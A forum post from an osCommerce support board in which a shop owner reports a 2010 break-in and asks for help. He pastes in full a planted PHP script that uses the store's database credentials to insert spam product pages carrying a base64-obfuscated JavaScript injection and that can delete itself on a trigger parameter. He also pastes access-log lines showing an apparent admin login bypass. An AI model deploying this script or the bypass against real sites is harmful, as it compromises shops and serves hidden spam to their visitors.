Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

database got hack from Russian hacker


Guest

Recommended Posts

my osc database was got hacked, put some of drugs link to our products, I found the script on images folder call 1dbdor.php

 

<?php

 

ignore_user_abort(1);

set_time_limit(0);

 

include "../includes/configure.php";

include "../includes/database_tables.php";

 

$keysFile = "1dballed.txt";

$linksFile = "1dblinks.txt";

 

if ($_REQUEST['d'] == '1') {

unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);

unlink($keysFile);

unlink($linksFile);

die ('deleted');

}

 

$pageNum = 100;

 

$linksMinMax = array (2,5);

$keysMinMax = array (20,40);

$keycentMinMax = array (7,10);

$stepmaxdif = 5;

$addlink = base64_decode('PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPjwhLS0gDQp2YXIgcz0iPWVqdyF0dXptZj4jeGpldWk7Znlxc2Z0dGpwbyllcGR2bmZvdS9jcGV6L3BnZ3RmdVhqZXVpKjwhaWZqaGl1OzMxMTFxeTwhcWJlZWpvaC51cHE7MjExcXk8IW1mZ3U7MXF5PCF1cHE7MXF5PCFzamhpdTsxcXk8IWNiZGxoc3B2b2UuZHBtcHM7ISRnZ2dnZ2c8IXVmeXUuYm1qaG87IWRmb3VmczwhcXB0anVqcG87IWJjdHBtdnVmPCF3anRqY2ptanV6OyF3anRqY21mPCF7LmpvZWZ5OyEzMjYyPCFlanRxbWJ6OyFjbXBkbDwjPz1iIWlzZmc+IyMhcG9EbWpkbD4jeGpvZXB4L21wZGJ1anBvIT4oaXV1cTswMHdmZGp1Zi9qb2dwMGdic25iL3FpcSg8IXNmdXZzbyFnYm10ZjwjPz1qbmghY3BzZWZzPjEhdHNkPiNpdXVxOzAweW5tL3Fiem5mb3VzeS9kcG4wY2Jvb2ZzdDA0NDd5MzkxL2txaCM/Cz1jcz89dHVzcG9oPz8/PyFEbWpkbCF1cCFGb3VmcyE9PT09MHR1c3BvaD89MGI/PTBlanc/IjttPSIiO2ZvcihpPTA7aTxzLmxlbmd0aDtpKyspe2lmKHMuY2hhckNvZGVBdChpKT09Mjgpe20rPScmJ31lbHNlIGlmKHMuY2hhckNvZGVBdChpKT09MjMpe20rPSchJ31lbHNle20rPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGkpLTEpfX1kb2N1bWVudC53cml0ZShtKTsvLy0tPjwvc2NyaXB0Pg==');

$lastkdel = "";

 

$link = mysql_pconnect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die("Could not connect");

mysql_select_db(DB_DATABASE);

 

$keysArr = file ($keysFile);

 

for ($i=0;$i<=$pageNum-1;$i++)

{

$key = $keysArr[$i];

//foreach ($keysArr as $key)

//{

$page = '';

$key = ucfirst(trim($key));

$page = $addlink;

$page .= pageGen ($key);

$page .= AddLinks ();

insertDB ($key , $page);

//}

 

}

echo '1DBDOR';

 

function pageGen ($key)

{

global $keysMinMax , $keycentMinMax , $stepmaxdif , $keysArr;

 

$i=1;

$stepi = 1;

$maxslov = rand ($keysMinMax[0],$keysMinMax[1]);

 

$percent = rand ($keycentMinMax[0],$keycentMinMax[1]);

 

$mk = (int)($percent*$maxslov)/($percent+100) ;

$srstep = (int)$maxslov/$mk ;

 

$addtopage .= '<h1>'.$key.'</h1>';

 

while ($i <= $maxslov)

{

if ($stepi % 2 != 0)

{

$stepdif = rand(0,$stepmaxdif);

$step = $srstep + $stepdif;

}

else

{

$step = $srstep - $stepdif;

}

 

if ($i % $step == 0)

{

$tagkey = randtag($key);

$addtopage .= randDel($tagkey);

$i++;

$stepi++;

}

else

{

$otherkey = rand(0, count($keysArr)-1);

$addtopage .= randDel(trim($keysArr[$otherkey]));

$i++;

}

 

}

return $addtopage;

}

 

function randDel ($key)

{

global $lastkdel;

$dArr = array (' ' , ' ' , ', ' , '. ' , ' - ' , ': ' , '<br>', '<br><br>');

$d = array_rand ($dArr);

if ($lastkdel == '. ' || $lastkdel == '<br>' || $lastkdel == '<br><br>')

{

$res = ucfirst($key) . $dArr[$d];

}

else

{

$res = $key.$dArr[$d];

}

$lastkdel = $dArr[$d];

return $res;

}

 

function randtag ($string)

{

 

$st = array ( '<b>' , '<strong>' , '<i>' , '<em>' , '<blockquote>');

$et = array ('</b>', '</strong>', '</i>', '</em>' , '</blockquote>');

 

$r = rand (0 , count($st)-1);

 

return $st[$r] . $string . $et[$r];

}

 

function AddLinks ()

{

global $linksFile , $linksMinMax;

$addlinks = '';

$linksDel = array (', ' , ' | ' , '<br>');

$ldc = count($linksDel);

if (file_exists($linksFile))

{

$links = file ($linksFile);

$c = count ($links);

if ($c > $linksMinMax[1]*2)

{

$lmax = rand ($linksMinMax[0],$linksMinMax[1]);

$ldi = rand (0 , $ldc-1);

for ($i=0 ; $i < $lmax ; $i++ )

{

$addlinks .= ($i == 0) ? ( trim($links[rand(0,$c-1)]) ) : ( $linksDel[$ldi] . trim($links[rand(0,$c-1)]) );

}

return $addlinks;

}

else

{

return ;

}

}

else

{

return ;

}

}

 

function insertDB ( $key , $descr )

{

 

$key = mysql_escape_string($key);

$descr = mysql_escape_string($descr);

 

$r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS." (products_date_added,products_status) VALUES ('1993-01-01 01:00:00','1')" );

 

$r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS_DESCRIPTION." (products_name,products_description) VALUES ('".$key."','".$descr."')" );

$r = mysql_query ("select last_insert_id()");

$pid = mysql_result ($r, 0, 0);

 

 

LinkToFile ($pid , $key);

}

 

function linkToFile ($id , $key)

{

global $linksFile;

$link = '<a href="' . HTTP_SERVER . DIR_WS_HTTP_CATALOG .'product_info.php?products_id=' . $id . '">' . $key . '</a>';

$fp = fopen ($linksFile , "a");

fputs ($fp , $link."\r\n");

fclose ($fp);

}

 

?>

 

I can't found how can they login my admin, and the log

 

188.120.234.41 - - [05/Aug/2010:06:02:41 +0800] "GET /images/1dbdor.php HTTP/1.0" 200 181 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:51 +0800] "GET /images/1dblinks.txt HTTP/1.0" 200 9253 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:52 +0800] "GET /images/1dbdor.php?d=1 HTTP/1.0" 200 182 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:28 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:33 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:37 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:39 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"

 

anyone can advise?

 

Regards

Dan

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...